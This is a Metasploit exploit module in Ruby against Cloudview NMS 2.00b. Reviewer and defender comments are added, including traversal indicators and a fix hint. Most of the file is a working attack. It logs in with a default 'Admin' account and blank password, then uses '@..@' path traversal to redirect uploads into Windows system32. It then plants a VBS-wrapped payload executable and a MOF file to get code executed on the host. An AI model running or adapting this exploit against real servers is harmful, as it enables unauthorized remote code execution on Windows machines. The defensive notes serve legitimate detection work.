require 'msf/core'

# Cloudview NMS file-upload module (Metasploit module format).
#
# Flow, exactly as implemented in #exploit below: POST a login form to
# "/MPR=<n>:/" where <n> is a number chosen by this client; GET the
# "descriptor!ChangeDir=" endpoint with an "@..@"-separated path so that the
# upload directory points outside the web root; then POST a multipart form
# (part name "upfile") carrying first a VBS-wrapped executable and then a MOF
# document. Each upload reply is matched against the text "Uploaded file OK".
#
# Defender notes (all derived from the request construction in this file):
# - A request to a path of the form "/MPR=<digits>:/" that contains
#   "descriptor!ChangeDir=" with "@..@" sequences is the traversal indicator.
# - A multipart POST to "/MPR=<digits>:/" with a form part named "upfile" and a
#   ".vbs" filename, directly after such a ChangeDir request, is the upload step.
# - The fix belongs in the application: the ChangeDir value has to be
#   canonicalised and confined to the intended directory before it is used.
# - NOTE(review): the 'Description' says versions "< 2.00b" are affected while
#   the only target entry is labelled "2.00b"; confirm the affected range.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient # send_request_cgi, RHOST/RPORT
  include Msf::Exploit::EXE                # generate_payload_exe
  include Msf::Exploit::WbemExec           # generate_mof

  # Module metadata and datastore options.
  #
  # USERNAME defaults to "Admin" and PASSWORD is optional with an empty default,
  # i.e. the module assumes an account with a blank password unless told
  # otherwise. RPORT defaults to 80 (plain HTTP).
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Cloudview NMS File Upload',
      'Description'=> %q{ This module exploits a file upload vulnerability found within Cloudview NMS < 2.00b. The vulnerability is triggered by sending specialized packets to the server with directory traversal sequences (..@ in this case) to browse outside of the web root. },
      'Author' => [ 'james fitts' ],
      'License'=> MSF_LICENSE,
      # NOTE(review): '0day' is not a resolvable reference; no advisory or CVE
      # is recorded on this page.
      'References' => [ [ 'URL', '0day' ] ],
      'DefaultOptions' => { 'EXITFUNC' => 'thread', },
      'Privileged' => true,
      'Payload'=> { 'BadChars' => "\x00", },
      'Platform' => 'win',
      'Targets'=> [ [ 'Cloudview NMS 2.00b on Windows', {} ], ],
      'DefaultTarget'=> 0,
      'DisclosureDate' => 'Oct 13 2014'))
    register_options([
      Opt::RPORT(80),
      OptString.new('USERNAME', [ true, "The username to log in with", "Admin" ]),
      OptString.new('PASSWORD', [ false, "The password to log in with", "" ])
    ], self.class )
  end

  # Runs the login / ChangeDir / upload sequence described on the class comment.
  #
  # Every HTTP step embeds @sess, a random Integer in 0..2048 picked here on the
  # client side; the server therefore appears to accept any caller-supplied
  # MPR value — NOTE(review): not verifiable from this file alone.
  def exploit
    # setup
    # File names are 5..14 random alphabetic characters (rand(10)+5).
    vbs_name = rand_text_alpha(rand(10)+5) + '.vbs'
    exe = generate_payload_exe
    # VBS wrapper around the payload executable (per the helper's name).
    vbs_content = Msf::Util::EXE.to_exe_vbs(exe)
    mof_name = rand_text_alpha(rand(10)+5) + '.vbs'
    # generate_mof comes from WbemExec; it is handed both names, so the MOF
    # presumably refers to vbs_name — confirm against the mixin.
    mof = generate_mof(mof_name, vbs_name)
    peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
    print_status("Uploading #{vbs_name} to #{peer}...")

    # logging in to get the "session"
    # Form-encoded login POST; the response is not inspected, so a failed
    # login is only noticed later when the upload check fails.
    @sess = rand(0..2048)
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => "/MPR=#{@sess}:/",
      'version' => '1.1',
      'ctype' => 'application/x-www-form-urlencoded',
      'data' => "username=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}&mybutton=Login%21&donotusejava=html"
    })

    # This is needed to setup the upload directory
    # The "@..@" segments in ChangeDir are the traversal sequences named in
    # the module description; the response is not checked.
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@!-!-!@extdir%5Cfilelistpage!-!1000",
      'version' => '1.1',
    })

    # Uploading VBS file
    data =
      Rex::MIME::Message.new
    data.add_part("#{vbs_content}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{vbs_name}\"")
    # Drop the CRLF that precedes the first "--_Part_" boundary so the body
    # starts directly with the boundary line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => "/MPR=#{@sess}:/",
      'version' => '1.1',
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    })

    # NOTE(review): res is presumably nil when no response arrives, in which
    # case res.body raises here instead of reporting a failure.
    if res.body =~ /Uploaded file OK/
      print_good("Uploaded #{vbs_name} successfully!")
      print_status("Uploading #{mof_name} to #{peer}...")

      # Setting up upload directory
      # Same ChangeDir request as above, with the wbem@mof subdirectory appended.
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@wbem@mof@!-!-!@extdir%5Cfilelistpage!-!1000",
        'version' => '1.1'
      })

      # Uploading MOF file
      # Same multipart construction as for the VBS part.
      data = Rex::MIME::Message.new
      data.add_part("#{mof}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{mof_name}\"")
      post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
      res = send_request_cgi({
        'method' => 'POST',
        'uri' => "/MPR=#{@sess}:/",
        'version' => '1.1',
        'ctype' => "multipart/form-data; boundary=#{data.bound}",
        'data' => post_data
      })

      # NOTE(review): same nil-response caveat as for the first upload check.
      if res.body =~ /Uploaded file OK/
        print_good("Uploaded #{mof_name} successfully!")
      else
        print_error("Something went wrong...")
      end
    else
      print_error("Something went wrong...")
    end
  end
end